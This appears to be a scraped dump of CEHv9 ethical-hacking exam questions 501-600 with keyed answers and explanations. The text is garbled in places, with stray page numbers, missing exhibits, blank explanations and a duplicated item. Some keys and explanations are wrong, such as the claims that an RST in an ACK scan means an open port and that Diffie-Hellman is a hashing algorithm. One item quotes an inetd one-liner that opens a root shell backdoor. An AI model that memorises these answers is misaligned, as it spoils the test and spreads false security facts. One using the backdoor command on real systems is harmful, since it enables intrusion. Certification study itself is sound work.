CEHv9 Questions 501-600

562 DRAG DROP A Successfully Attack by a malicious hacker can divide into five phases, Match the order: 340

341

573 How would you permanently wipe the data in the hard disk? A. wipe -fik /dev/hda1 B. erase -fik /dev/hda1 C. delete -fik /dev/hda1 D. secdel -fik /dev/hda1 346

A Explanation:

595 TCP/IP Session Hijacking is carried out in which OSI layer? A. Transport layer B. Datalink layer 360 C. Physical Layer D. Network Layer

A Explanation:

512 Blake is in charge of securing all 20 of his company's servers. He has enabled hardware and software firewalls, hardened the operating systems and disabled all unnecessary service on all the servers. Unfortunately, there is proprietary AS400 emulation software that must run on one of the servers that requires the telnet service to function properly. Blake is especially concerned about his since telnet can be a very large security risk in an organization. Blake is concerned about how his particular server might look to an outside attacker so he decides to perform some footprinting scanning and penetration tests on the server. Blake telents into the server and types the following command: HEAD/HTTP/1.0 After pressing enter twice, Blake gets the following results: What has the Blake just accomplished? A. Grabbed the banner B. Downloaded a file to his local computer C. Submitted a remote command to crash the server D. Poisoned the local DNS cache of the server

A Explanation: 311

586 More sophisticated IDSs look for common shellcode signatures. But even these systems can be bypassed, by using polymorphic shellcode. This is a technique common among virus writers - it basically hides the true nature of the shellcode in different disguises. How does a polymorphic shellcode work? A. They convert the shellcode into Unicode, using loader to convert back to machine code then 354 executing them B. They compress shellcode into normal instructions, uncompress the shellcode using loader code and then executing the shellcode C. They reverse the working instructions into opposite order by masking the IDS signatures D. They encrypt the shellcode by XORing values over the shellcode, using loader code to decrypt the shellcode, and then executing the decrypted shellcode

A Explanation: In computer security, a shellcode is a small piece of code used as the payload in the exploitation of a software vulnerability. It is called "shellcode" because it typically starts a command shell from which the attacker can control the compromised machine. Shellcode is commonly written in machine code, but any piece of code that performs a similar task can be called shellcode

574 Theresa is an IT security analyst working for the United Kingdom Internet Crimes Bureau in London. Theresa has been assigned to the software piracy division which focuses on taking down individual and organized groups that distribute copyrighted software illegally. Theresa and her division have been responsible for taking down over 2,000 FTP sites hosting copyrighted software. Theresa's supervisor now wants her to focus on finding and taking down websites that host illegal pirated software. What are these sights called that Theresa has been tasked with taking down? A. These sites that host illegal copyrighted software are called Warez sites B. These sites that Theresa has been tasked to take down are called uTorrent sites C. These websites are referred to as Dark Web sites D. Websites that host illegal pirated versions of software are called Back Door sites

A Explanation: The Warez scene, often referred to as The Scene (often capitalized) is a term of self-reference used by a community that specializes in the underground distribution of pirated content, typically software but increasingly including movies and music.

515 Angela is trying to access an education website that requires a username and password to login. When Angela clicks on the link to access the login page, she gets an error message stating that the page can't be reached. She contacts the website's support team and they report that no one else is having any issues with the site. After handing the issue over to her company's IT department, it is found that the education website requires any computer accessing the site must be able to respond to a ping from the education's server. Since Angela's computer is behind a corporate firewall, her computer can't ping the education website back. What ca Angela's IT department do to get access to the education website? A. Change the IP on Angela's Computer to an address outside the firewall B. Change the settings on the firewall to allow all incoming traffic on port 80 C. Change the settings on the firewall all outbound traffic on port 80 D. Use a Internet browser other than the one that Angela is currently using

A Explanation: Allowing traffic to and from port 80 will not help as this will be UDP or TCP traffic and ping uses ICMP. The browser used by the user will not make any difference. The only alternative here that would solve the problem is to move the computer to outside the firewall.

553 Microsoft Authenticode technology is used for: A. Digital Signing Activex controls B. Digitally signing SSL Certificates C. Digitally Signing JavaScript Files D. Digitally Signing Java Applets

A Explanation: Authenticode identifies the publisher of signed software and verifies that it hasn't been tampered with, before users download software to their PCs. As a result, end users can make a more informed decision as to whether or not to download code. Authenticode relies on digital certificates and is based on specifications that have been used successfully in the industry for some time, including Public Key Cryptography Standards (PKCS) #7 (encrypted key specification), PKCS #10 (certificate request formats), X.509 (certificate specification), and Secure Hash Algorithm (SHA) and MD5 hash algorithms. 336

521 The programmers on your team are analyzing the free, open source software being used to run FTP services on a server. They notice that there is an excessive number of fgets() and gets() on the source code. These C++ functions do not check bounds. What kind of attack is this program susceptible to? A. Buffer of Overflow B. Denial of Service C. Shatter Attack D. Password Attack

A Explanation: C users must avoid using dangerous functions that do not check bounds unless they've ensured that the bounds will never get exceeded. A buffer overflow occurs when you write a set of values (usually a string of characters) into a fixed length buffer and write at least one value outside that buffer's boundaries (usually past its end). A buffer overflow can occur when reading input from the user into a buffer, but it can also occur during other kinds of processing in a program.

527 StackGuard (as used by Immunix), ssp/ProPolice (as used by OpenBSD), and Microsoft's /GS option use _____ defense against buffer overflow attacks. A. Canary B. Hex editing C. Format checking D. Non-executing stack

A Explanation: Canaries or canary words are known values that are placed between a buffer and control data on the stack to monitor buffer overflows. When the buffer overflows, it will clobber the canary, making the overflow evident. This is a reference to the historic practice of using canaries in coal mines, since they would be affected by toxic gases earlier than the miners, thus providing a biological warning system.

533 In Buffer Overflow exploit, which of the following registers gets overwritten with return address of the exploit code? A. EIP B. ESP C. EAP D. EEP

A Explanation: EIP is the instruction pointer which is a register, it points to your next command. 325

549 One of the most common and the best way of cracking RSA encryption is to being to derive the two prime numbers, which are used in the RSA PKI mathematical process. If the two numbers p and q are discovered through a _________________ process, then the private key can be derived. A. Factorization B. Prime Detection C. Hashing D. Brute-forcing

A Explanation: In April 1994, an international cooperative group of mathematicians and computer scientists solved a 17-year-old challenge problem, the factoring of a 129-digit number, called RSA- 129, into two primes. That is, RSA-129 = 1143816257578888676692357799761466120102182 9672124236256256184293570693524573389783059 7123563958705058989075147599290026879543541 = 34905295108476509491478496199038 98133417764638493387843990820577 times 32769132993266709549961988190834 461413177642967992942539798288533. Se more at http://en.wikipedia.org/wiki/RSA_Factoring_Challenge

554 One of the most common and the best way of cracking RSA encryption is to being to derive the two prime numbers, which are used in the RSA PKI mathematical process. If the two numbers p and q are discovered through a _________________ process, then the private key can be derived. A. Factorization B. Prime Detection C. Hashing D. Brute-forcing

A Explanation: In April 1994, an international cooperative group of mathematicians and computer scientists solved a 17-year-old challenge problem, the factoring of a 129-digit number, called RSA- 129, into two primes. That is, RSA-129 = 1143816257578888676692357799761466120102182 9672124236256256184293570693524573389783059 7123563958705058989075147599290026879543541 = 34905295108476509491478496199038 98133417764638493387843990820577 times 32769132993266709549961988190834 461413177642967992942539798288533. Se more at http://en.wikipedia.org/wiki/RSA_Factoring_Challenge

569 If you perform a port scan with a TCP ACK packet, what should an OPEN port return? A. RST B. No Reply C. SYN/ACK D. FIN

A Explanation: Open ports return RST to an ACK scan.

551 Richard is a network Administrator working at a student loan company in lowa. This company processes over 20,000 students loan a year from colleges all over the state. Most communication between the company, schools and lenders is carried out through email. Because of privacy laws that are in the process of being implemented, Richard wants to get ahead of the game and become compliant before any sort of auditing occurs. Much of the email communication used at his company contains sensitive information such as social security numbers. For this reason, Richard wants to utilize email encryption agency-wide. The only problem for Richard is that his department only has couple of servers and they are utilized to their full capacity. Since a server-based PKI is not an option for him, he is looking for a low/no cost solution to encrypt email. What should Richard use? A. PGP B. RSA C. 3DES D. OTP

A Explanation: PGP (Pretty Good Privacy) is an encryption program being used for secure transmission of files and e-mails. This adapts public-key encryption technology in which pairs of keys are used to maintain secure communication. For PGP-based communication both the sender and receiver should have public and private key pairs. The sender's public key should be distributed to the receiver. Similarly, the receiver's public key should be distributed to the sender. When sending a message or a file, the sender can sign using his private key. Also, the sender's private key is never distributed. All encryption is made on the workstation sending the e-mail. 335

535 Which programming language is NOT vulnerable to buffer overflow attacks? 326 A. Java B. ActiveX C. C++ D. Assembly Language

A Explanation: Perl and Java has boundary checking, hence buffer overflows don't occur. On the other hand, Perl and Java don't offer access to the system that is as deep as some programs need. Topic 21, Cryptography

517 This IDS defeating technique works by splitting a datagram (or packet) into multiple fragments and the IDS will not spot the true nature of the fully assembled datagram. The datagram is not reassembled until it reaches its final destination. It would be a processorintensive tasks for an IDS to reassemble all fragments itself and on a busy system the packet will slip through the IDS onto the network. What is this technique called? A. IP Fragmentation or Session Splicing B. IP Routing or Packet Dropping C. IDS Spoofing or Session Assembly D. IP Splicing or Packet Reassembly

A Explanation: The basic premise behind session splicing, or IP Fragmentation, is to deliver the payload over multiple packets thus defeating simple pattern matching without session reconstruction. This payload can be delivered in many different manners and even spread out over a long period of time. Currently, Whisker and Nessus have session splicing capabilities, and other tools exist in the wild. 314

507 Exhibit: 307 Given the following extract from the snort log on a honeypot, what service is being exploited? : A. FTP B. SSH C. Telnet D. SMTP

A Explanation: The connection is done to 172.16.1.104:21.

532 When writing shellcodes, you must avoid _________________ because these will end the string. 324 A. Null Bytes B. Root Bytes C. Char Bytes D. Unicode Bytes

A Explanation: The null character (also null terminator) is a character with the value zero, present in the ASCII and Unicode character sets, and available in nearly all mainstream programming languages. The original meaning of this character was like NOP — when sent to a printer or a terminal, it does nothing (some terminals, however, incorrectly display it as space). Strings ending in a null character are said to be null-terminated.

591 WWW wanderers or spiders are programs that traverse many pages in the World Wide Web by recursively retrieving linked pages. Search engines like Google, frequently spider web pages for indexing. How will you stop web spiders from crawling certain directories on your website? A. Place robots.txt file in the root of your website with listing of directories that you don't want to be crawled B. Place authentication on root directories that will prevent crawling from these spiders 357 C. Place "HTTP:NO CRAWL" on the html pages that you don't want the crawlers to index D. Enable SSL on the restricted directories which will block these spiders from crawling

A Explanation: WWW Robots (also called wanderers or spiders) are programs that traverse many pages in the World Wide Web by recursively retrieving linked pages. The method used to exclude robots from a server is to create a file on the server which specifies an access policy for robots. This file must be accessible via HTTP on the local URL "/robots.txt". http://www.robotstxt.org/orig.html#format

519 Study the following exploit code taken from a Linux machine and answer the questions below: echo "ingreslock stream tcp nowait root /bin/sh sh -I" > /tmp/x; /usr/sbin/inetd -s /tmp/x; sleep 10; /bin/ rm -f /tmp/x AAAA...AAA 315 In the above exploit code, the command "/bin/sh sh -I" is given. What is the purpose, and why is 'sh' shown twice? A. The command /bin/sh sh -i appearing in the exploit code is actually part of an inetd configuration file. B. The length of such a buffer overflow exploit makes it prohibitive for user to enter manually. The second 'sh' automates this function. C. It checks for the presence of a codeword (setting the environment variable) among the environment variables. D. It is a giveaway by the attacker that he is a script kiddy.

A Explanation: What's going on in the above question is the attacker is trying to write to the unix filed /tm/x (his inetd.conf replacement config) -- he is attempting to add a service called ingresslock (which doesnt exist), which is "apparently" suppose to spawn a shell the given port specified by /etc/services for the service "ingresslock", ingresslock is a non-existant service, and if an attempt were made to respawn inetd, the service would error out on that line. (he would have to add the service to /etc/services to suppress the error). Now the question is asking about /bin/sh sh -i which produces an error that should read "sh: /bin/sh: cannot execute binary file", the -i option places the shell in interactive mode and cannot be used to respawn itself.

568 If you receive a RST packet while doing an ACK scan, it indicates that the port is open.(True/False). A. True B. False

A Explanation: When and ACK is sent to an open port, a RST is returned. 344

505 Which of the following countermeasure can specifically protect against both the MAC Flood and MAC Spoofing attacks? A. Port Security B. Switch Mapping C. Port Reconfiguring D. Multiple Recognition

A Explanation: With Port Security the switch will keep track of which ports are allowed to send traffic on a port.

596 Reflective DDoS attacks do not send traffic directly at the targeted host. Instead, they usually spoof the originating IP addresses and send the requests at the reflectors. These reflectors (usually routers or high-powered servers with a large amount of network resources at their disposal) then reply to the spoofed targeted traffic by sending loads and loads of data to the final target. How would you detect these reflectors on your network? A. Run floodnet tool to detect these reflectors B. Look for the banner text by running Zobbie Zappers tools C. Run Vulnerability scanner on your network to detect these reflectors D. Scan the network using Nmap for the services used by these reflectors

A Explanation: http://www.exterminate-it.com/malpedia/remove-floodnet

518 John runs a Web Server, IDS and firewall on his network. Recently his Web Server has been under constant hacking attacks. He looks up the IDS log files and sees no Intrusion attempts but the web server constantly locks up and needs rebooting due to various brute force and buffer overflow attacks but still the IDS alerts no intrusion whatsoever. John become suspicious and views he firewall logs and he notices huge SSL connections constantly hitting web server. Hackers have been using the encrypted HTTPS protocol to send exploits to the web server and that was the reason the IDS did not detect the intrusions. How would Jon protect his network form these types of attacks? A. Install a proxy server and terminate SSL at the proxy B. Install a hardware SSL "accelerator" and terminate SSL at this layer C. Enable the IDS to filter encrypted HTTPS traffic D. Enable the firewall to filter encrypted HTTPS traffic

A,B Explanation: By terminating the SSL connection at a proxy or a SSL accelerator and then use clear text the distance between the proxy/accelerator and the server, you make it possible for the IDS to scan the traffic. Topic 20, Buffer Overflows

531 Which of the following built-in C/C++ functions you should avoid to prevent your program from buffer overflow attacks? A. strcpy() B. strcat() C. streadd() D. strscock()

A,B,C Explanation: When hunting buffer overflows, the first thing to look for is functions which write into arrays without any way to know the amount of space available. If you get to define the function, you can pass a length parameter in, or ensure that every array you ever pass to it is at least as big as the hard-coded maximum amount it will write. If you're using a function someone else (like, say, the compiler vendor) has provided then avoiding functions like gets(), which take some amount of data over which you have no control and stuff it into arrays they can never know the size of, is a good start. Make sure that functions like the str...() family which expect NUL-terminated strings actually get them - store a '\0' in the last element of each array involved just before you call the function, if necessary. Strscock() is not a valid C/C++ function.

525 Buffer X is an Accounting application module for company can contain 200 characters. The 319 programmer makes an assumption that 200 characters are more than enough. Because there were no proper boundary checks being conducted. Dave decided to insert 400 characters into the 200-character buffer which overflows the buffer. Below is the code snippet: Void func (void) {int I; char buffer [200]; for (I=0; I<400; I++) buffer (I)= 'A'; return; } How can you protect/fix the problem of your application as shown above? (Choose two) A. Because the counter starts with 0, we would stop when the counter is less then 200. B. Because the counter starts with 0, we would stop when the counter is more than 200. C. Add a separate statement to signify that if we have written 200 characters to the buffer, the stack should stop because it cannot hold any more data. D. Add a separate statement to signify that if we have written less than 200 characters to the buffer, the stack should stop because it cannot hold any more data.

A,C Explanation: I=199 would be the character number 200. The stack holds exact 200 characters so there is no need to stop before 200.

534 Buffer X in an Accounting application module for Brownies Inc. can contain 200 characters. The programmer makes an assumption that 200 characters are more than enough. Because there were no proper boundary checks being conducted, Bob decided to insert 400 characters into the 200-character buffer. (Overflows the buffer). Below is the code snippet. How can you protect/fix the problem of your application as shown above? A. Because the counter starts with 0, we would stop when the counter is less than 200 B. Because the counter starts with 0, we would stop when the counter is more than 200 C. Add a separate statement to signify that if we have written 200 characters to the buffer, the stack should stop because it can't hold any more data D. Add a separate statement to signify that if we have written less than 200 characters to the buffer, the stack should stop because it can't hold any more data

A,C Explanation: I=199 would be the character number 200. The stack holds exact 200 characters so there is no need to stop before 200.

582 An SNMP scanner is a program that sends SNMP requests to multiple IP addresses, trying different community strings and waiting for a reply. Unfortunately SNMP servers don't respond to requests with invalid community strings and the underlying protocol does not reliably report closed ports. This means that 'no response' from the probed IP address can mean which of the following: (Select up to 3) A. Invalid community string B. S-AUTH protocol is running on the SNMP server C. Machine unreachable D. SNMP server not running

A,C,D Explanation: http://en.wikipedia.org/wiki/Simple_Network_Management_Protocol

508 There are two types of honeypots- high and low interaction. Which of these describes a low interaction honeypot? 308 Select the best answers. A. Emulators of vulnerable programs B. More likely to be penetrated C. Easier to deploy and maintain D. Tend to be used for production E. More detectable F. Tend to be used for research

A,C,D,E Explanation: Explanations: A low interaction honeypot would have emulators of vulnerable programs, not the real programs. A high interaction honeypot is more likely to be penetrated as it is running the real program and is more vulnerable than an emulator. Low interaction honeypots are easier to deploy and maintain. Usually you would just use a program that is already available for download and install it. Hackers don't usually crash or destroy these types of programs and it would require little maintenance. A low interaction honeypot tends to be used for production. Low interaction honeypots are more detectable because you are using emulators of the real programs. Many hackers will see this and realize that they are in a honeypot. A low interaction honeypot tends to be used for production. A high interaction honeypot tends to be used for research.

565 You just purchased the latest DELL computer, which comes pre-installed with Windows XP, McAfee antivirus software and a host of other applications. You want to connect Ethernet wire to your cable modem and start using the computer immediately. Windows is dangerously insecure when unpacked from the box, and there are a few things that you must do before you use it. A. New Installation of Windows Should be patched by installation the latest service packs and hotfixes B. Enable "guest" account C. Install a personal firewall and lock down unused ports from connecting to your computer D. Install the latest signatures for Antivirus software E. Configure "Windows Update" to automatic F. Create a non-admin user with a complex password and login to this account

A,C,D,E,F Explanation: The guest account is a possible vulnerability to your system so you should not enable it unless needed. Otherwise you should perform all other actions mentioned in order to have a secure system. Topic 23, Mixed Questions

511 What is the advantage in encrypting the communication between the agent and the monitor in an Intrusion Detection System? A. Encryption of agent communications will conceal the presence of the agents B. The monitor will know if counterfeit messages are being generated because they will not be encrypted C. Alerts are sent to the monitor when a potential intrusion is detected D. An intruder could intercept and delete data or alerts and the intrusion can go undetected 310

B Explanation:

561 Which type of attack is port scanning? A. Web server attack B. Information gathering C. Unauthorized access D. Denial of service attack

B Explanation:

580 Giles is the network administrator for his company, a graphics design company based in Dallas. Most of the network is comprised of Windows servers and workstations, except for some designers that prefer to use MACs. These MAC users are running on the MAC OS X operating system. These MAC users also utilize iChat to talk between each other. Tommy, one of these MAC users, calls Giles and says that his computer is running very slow. Giles then gets more calls from the other MAC users saying they are receiving instant messages from Tommy even when he says he is not on his computer. Giles immediately unplugs Tommy's computer from the network to take a closer look. He opens iChat on Tommy's computer and it says that it sent a file called latestpics.tgz to all the other MAC users. Tommy says he never sent those files. Giles also sees that many of the computer's applications appear to be altered. The path where the files should be has an altered file and the original application is stored in the file's resource fork. What has Giles discovered on Tommy's computer? A. He has discovered OSX/Chat-burner virus on Tommy's computer B. Giles has found the OSX/Leap-A virus on Tommy's computer C. This behavior is indicative of the OSX/Inqtana.A virus D. On Tommy's computer, Giles has discovered an apparent infection of the OSX/Transmitter.B virus

B Explanation: OSX.Leap.A is a worm that targets installs of Macintosh OS X and spreads via iChat Instant Messenger program. http://www.symantec.com/security_response/writeup.jsp?docid=2006-021614-4006-99

577 Theresa is the chief information security officer for her company, a large shipping company based out of New York City. In the past, Theresa and her IT employees manually checked the status of client computers on the network to see if they had the most recent Microsoft updates. Now that the company has added over 100 more clients to accommodate new departments, Theresa must find some kind of tool to see whether the clients are up-to-date or not. Theresa decides to use Qfecheck to monitor all client computers. When Theresa runs the tool, she is repeatedly told that the software does not have the proper permissions to scan. Theresa is worried that the operating system hardening that she performs on all clients is keeping the software from scanning the necessary registry keys on the client computers. What registry key permission should Theresa check to ensure that Qfecheck runs properly? A. In order for Qfecheck to run properly, it must have enough permission to read B. She needs to check the permissions of the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates registry key C. Theresa needs to look over the permissions of the registry key D. The registry key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Microsoft must be checked

B Explanation: Qfecheck check the registry HKLM\Software\Microsoft\Updates

579 Justine is the systems administrator for her company, an international shipping company with offices all over the world. Recent US regulations have forced the company to implement stronger and more secure means of communication. Justine and other administrators have been put in charge of securing the company's digital communication lines. After implementing email encryption, Justine now needs to implement robust digital signatures to ensure data authenticity and reliability. Justine has decided to implement digital signatures which are a variant of DSA and that operate on elliptical curve groups. These signatures are more efficient than DSA and are not vulnerable to a number field sieve attacks. What type of signature has Justine decided to implement? A. She has decided to implement ElGamal signatures since they offer more reliability than the typical DSA signatures B. Justine has decided to use ECDSA signatures since they are more efficient than DSA signatures C. Justine is now utilizing SHA-1 with RSA signatures to help ensure data reliability D. These types of signatures that Justine has decided to use are called RSA-PSS signatures

B Explanation: The Elliptic Curve Digital Signature Algorithm (ECDSA) is a variant of the Digital Signature Algorithm (DSA) which uses Elliptic curve cryptography. http://en.wikipedia.org/wiki/Elliptic_Curve_DSA 350

584 James is an IT security consultant as well as a certified ethical hacker. James has been asked to audit the network security of Yerta Manufacturing, a tool manufacturing company in Phoenix. James performs some initial external tests and then begins testing the security from inside the company's network. James finds some big problems right away; a number of users that are working on Windows XP computers have saved their usernames and passwords used to connect to servers on the network. This way, those users do not have to type in their credentials every time they want access to a server. James tells the IT manager of Yerta Manufacturing about this, and the manager does not believe this is possible on Windows XP. To prove his point, James has a user logon to a computer and then James types in a command that brings up a window that says "Stored User Names and Passwords". What command did James type in to get this window to come up? A. To bring up this stored user names and passwords window, James typed in "rundll32.exe storedpwd.dll, ShowWindow" B. James had to type in "rundll32.exe keymgr.dll, KRShowKeyMgr" to get the window to pop up C. James typed in the command "rundll32.exe storedpwd.dll" to get the Stored User Names and Passwords window to come up D. The command to bring up this window is "KRShowKeyMgr"

B Explanation: The Stored User Names and Passwords applet lets you assign user names and passwords to use 353 when needing to authenticate yourself to services in domains other than the one you are currently logged into. The normal way of running this applet can be difficult to find quickly, so here is a way to launch it using a desktop shortcut using the rundll32.exe program: Click on START - RUN and type the following (follwed by ENTER): rundll32.exe keymgr.dll,KRShowKeyMgr http://www.tweakxp.com/article37352.aspx

585 Bob was frustrated with his competitor, Brownies Inc., and decided to launch an attack that would result in serious financial losses. He planned the attack carefully and carried out the attack at the appropriate moment. Meanwhile, Trent, an administrator at Brownies Inc., realized that their main financial transaction server had been attacked. As a result of the attack, the server crashed and Trent needed to reboot the system, as no one was able to access the resources of the company. This process involves human interaction to fix it. What kind of Denial of Service attack was best illustrated in the scenario above? A. DOS attacks which involves flooding a network or system B. DOS attacks which involves crashing a network or system C. DOS attacks which is done accidentally or deliberately D. Simple DDOS attack

B Explanation: This is not a DDOS, there is only one person involved as attacker

552 A digital signature is simply a message that is encrypted with the public key instead of the private key. A. True B. False

B Explanation: Digital signatures enable the recipient of information to verify the authenticity of the information's origin, and also verify that the information is intact. Thus, public key digital signatures provide authentication and data integrity. A digital signature also provides non-repudiation, which means that it prevents the sender from claiming that he or she did not actually send the information. Instead of encrypting information using someone else's public key, you encrypt it with your private key. If the information can be decrypted with your public key, then it must have originated with you.

563 Oregon Corp is fighting a litigation suit with Scamster Inc. Oregon has assigned a private investigative agency to go through garbage, recycled paper, and other rubbish at Scamster's office site in order to find relevant information. What would you call this kind of activity? A. Garbage Scooping B. Dumpster Diving C. Scanning D. CI Gathering

B Explanation: Dumpster diving is the colloquial name for going through somebody's garbage -- which will usually be in dumpsters for large organizations. This is a powerful tactic because it is protected by social taboos. Trash is bad, and once it goes into the trash, something is best forgotten. The reality is that most company trash is fairly clean, and provides a gold mine of information.

571 What is the name of the software tool used to crack a single account on Netware Servers using a dictionary attack? A. NPWCrack B. NWPCrack C. NovCrack D. CrackNov E. GetCrack

B Explanation: NWPCrack is the software tool used to crack single accounts on Netware servers.

536 Jane wishes to forward X-Windows traffic to a remote host as well as POP3 traffic. She is worried that adversaries might be monitoring the communication link and could inspect captured traffic. She would line to tunnel the information to the remote end but does not have VPN capabilities to do so. Which of the following tools can she use to protect the link? A. MD5 B. SSH C. RSA D. PGP

B Explanation: Port forwarding, or tunneling, is a way to forward otherwise insecure TCP traffic through SSH Secure Shell. You can secure for example POP3, SMTP and HTTP connections that would otherwise be insecure.

528 A simple compiler technique used by programmers is to add a terminator 'canary word' containing four letters NULL (0x00), CR (0x0d), LF (0x0a) and EOF (0xff) so that most string operations are terminated. If the canary word has been altered when the function returns, and the program responds by emitting an intruder alert into syslog, and then halts what does it indicate? A. The system has crashed B. A buffer overflow attack has been attempted C. A buffer overflow attack has already occurred D. A firewall has been breached and this is logged E. An intrusion detection system has been triggered

B Explanation: Terminator Canaries are based on the observation that most buffer overflows and stack smash attacks are based on certain string operations which end at terminators. The reaction 322 to this observation is that the canaries are built of NULL terminators, CR, LF, and -1. The undesirable result is that the canary is known.

548 Bob is a Junior Administrator at ABC Company. He is installing the RedHat Enterprise Linux on his machine. At installation time, he removed the "Use MD5" options. What will be the hashing standard? A. MD2 B. DES C. 3DES D. RSA 333

B Explanation: crypt() will return an encrypted string using the standard Unix DES-based encryption algorithm or alternative algorithms that may be available on the system. By removing the "Use MD5" option Bob forces crypt() to revert to DES encryption.

589 You are configuring the security options of your mail server and you would like to block certain file attachments to prevent viruses and malware from entering the users inbox. Which of the following file formats will you block? (Select up to 6) A. .txt B. .vbs C. .pif D. .jpg E. .gif F. .com G. .htm H. .rar I. .scr J. .exe

B,C,E,F,I,J Explanation: 356 http://office.microsoft.com/en-us/outlook/HP030850041033.aspx

547 There is some dispute between two network administrators at your company. Your boss asks you to come and meet with the administrators to set the record straight. Which of these are true about PKI and encryption? Select the best answers. A. PKI provides data with encryption, compression, and restorability. B. Public-key encryption was invented in 1976 by Whitfield Diffie and Martin Hellman. C. When it comes to eCommerce, as long as you have authenticity, and authenticity, you do not need encryption. D. RSA is a type of encryption.

B,D Explanation: PKI provides confidentiality, integrity, and authenticity of the messages exchanged between these two types of systems. The 3rd party provides the public key and the receiver verifies the message with a combination of the private and public key. Public-key encryption WAS invented in 1976 by Whitfield Diffie and Martin Hellman. The famous hashing algorithm Diffie- Hellman was named after them. The RSA Algorithm is created by the RSA Security company that also has created other widely used encryption algorithms.

509 An Evil Cracker is attempting to penetrate your private network security. To do this, he must not be seen by your IDS, as it may take action to stop him. What tool might he use to bypass the IDS? Select the best answer. A. Firewalk B. Manhunt C. Fragrouter D. Fragids

C 309 Explanation: Explanations: Firewalking is a way to disguise a portscan. Thus, firewalking is not a tool, but a method of conducting a port scan in which it can be hidden from some firewalls. Synamtec Man-Hunt is an IDS, not a tool to evade an IDS. Fragrouter is a tool that can take IP traffic and fragment it into multiple pieces. There is a legitimate reason that fragmentation is done, but it is also a technique that can help an attacker to evade detection while Fragids is a made-up tool and does not exist.

556 Joel and her team have been going through tons of garbage, recycled paper, and other rubbish in order to find some information about the target they are attempting to penetrate. What would you call this kind of activity? A. CI Gathering B. Scanning C. Dumpster Diving D. Garbage Scooping

C Explanation:

557 A client has approached you with a penetration test requirements. They are concerned with the possibility of external threat, and have invested considerable resources in protecting their Internet exposure. However, their main concern is the possibility of an employee elevating his/her privileges and gaining access to information outside of their respective department. What kind of penetration test would you recommend that would best address the client's concern? A. A Black Box test B. A Black Hat test C. A Grey Box test D. A Grey Hat test 338 E. A White Box test F. A White Hat test

C Explanation:

558 In which of the following should be performed first in any penetration test? A. System identification B. Intrusion Detection System testing C. Passive information gathering D. Firewall testing

C Explanation:

593 Jeffery works at a large financial firm in Dallas, Texas as a securities analyst. Last week, the IT department of his company installed a wireless network throughout the building. The problem is, is that they are only going to make it available to upper management and the IT department. Most employees don't have a problem with this since they have no need for wireless networking, but Jeffery would really like to use wireless since he has a personal laptop that he works from as much as he can. Jeffery asks the IT manager if he could be allowed to use the wireless network but he is turned down. Jeffery is not satisfied, so he brings his laptop in to work late one night and tries to get access to the network. Jeffery uses the wireless utility on his laptop, but cannot see any wireless networks available. After about an hour of trying to figure it out, Jeffery cannot get on the company's wireless network. Discouraged, Jeffery leaves the office and goes home. The next day, Jeffery calls his friend who works with computers. His friend suggests that his IT department might have turned off SSID broadcasting, and that is why he could not see any wireless networks. How would Jeffrey access the wireless network? A. Run WEPCrack tool and brute force the SSID hashes B. Jam the wireless signal by launching denial of service attack C. Sniff the wireless network and capture the SSID that is transmitted over the wire in plaintext D. Attempt to connect using wireless device default SSIDs

C Explanation:

600 Lyle is a systems security analyst for Gusteffson & Sons, a large law firm in Beverly Hills. Lyle's responsibilities include network vulnerability scans, Antivirus monitoring, and IDS monitoring. Lyle receives a help desk call from a user in the Accounting department. This user reports that his computer is running very slow all day long and it sometimes gives him an error message that the hard drive is almost full. Lyle runs a scan on the computer with the company antivirus software and finds nothing. Lyle downloads another free antivirus application and scans the computer again. This time a virus is found on the computer. The infected files appear to be Microsoft Office files since they are in the same directory as that software. Lyle does some research and finds that this virus disguises itself as a genuine application on a computer to hide from antivirus software. What type of virus has Lyle found on this computer? A. This type of virus that Lyle has found is called a cavity virus. B. Lyle has discovered a camouflage virus on the computer. C. By using the free antivirus software, Lyle has found a tunneling virus on the computer. D. Lyle has found a polymorphic virus on this computer

C Explanation:

576 Marshall is the information security manager for his company. Marshall was just hired on two months ago after the last information security manager retired. Since the last manager did not implement or even write IT policies, Marshall has begun writing IT security policies to cover every conceivable aspect. Marshall's supervisor has informed him that while most employees will be under one set of policies, ten other employees will be under another since they work on computers in publicly-accessible areas. Per his supervisor, Marshall has written two sets of policies. For the users working on publicly-accessible computers, their policies state that everything is forbidden. They are not allowed to browse the Internet or even use email. The only thing they can use is their work related applications like Word and Excel. What types of policies has Marshall written for the users working on computers in the publiclyaccessible areas? A. He has implemented Permissive policies for the users working on public computers B. These types of policies would be considered Promiscuous policies C. He has written Paranoid policies for these users in public areas D. Marshall has created Prudent policies for the computer users in publicly-accessible areas

C Explanation: 348 It says that everything is forbidden, this means that there is a Paranoid Policy implemented

597 When a malicious hacker identifies a target and wants to eventually compromise this target, what would be the first step the attacker would perform? A. Cover his tracks by eradicating the log files B. Gain access to the remote computer for identification of venue of attacks C. Perform a reconnaissance of the remote target for identification of venue of attacks D. Always starts with a scan in order to quickly identify venue of attacks

C Explanation: 361

599 Attacker forges a TCP/IP packet, which causes the victim to try opening a connection with itself. This causes the system to go into an infinite loop trying to resolve this unexpected connection. Eventually, the connection times out, but during this resolution, the machine appears to hang or become very slow. The attacker sends such packets on a regular basis to slow down the system. Unpatched Windows XP and Windows Server 2003 machines are vulnerable to these attacks. What type of Denial of Service attack is represented here? A. SMURF Attacks B. Targa attacks C. LAND attacks D. SYN Flood attacks

C Explanation: 362 The attack involves sending a spoofed TCP SYN packet (connection initiation) with the target host's IP address and an open port as both source and destination.The reason a LAND attack works is because it causes the machine to reply to itself continuously. http://en.wikipedia.org/wiki/LAND

583 Charlie is an IT security consultant that owns his own business in Denver. Charlie has recently been hired by Fleishman Robotics, a mechanical engineering company also in Denver. After signing service level agreements and other contract papers, Charlie asks to look over the current company security policies. Based on these policies, Charlie compares the policies against what is actually in place to secure the company's network. From this information, Charlie is able to produce a report to give to company executives showing which areas the company is lacking in. This report then becomes the basis for all of Charlie's remaining tests. 352 What type of initial analysis has Charlie performed to show the company which areas it needs improvements in? A. Charlie has performed a BREACH analysis; showing the company where its weak points are B. This analysis would be considered a vulnerability analysis C. This type of analysis is called GAP analysis D. This initial analysis performed by Charlie is called an Executive Summary

C Explanation: In business and economics, gap analysis is a tool that helps a company to compare its actual performance with its potential performance. At its core are two questions: "Where are we?" and "Where do we want to be?". http://en.wikipedia.org/wiki/Gap_analysis

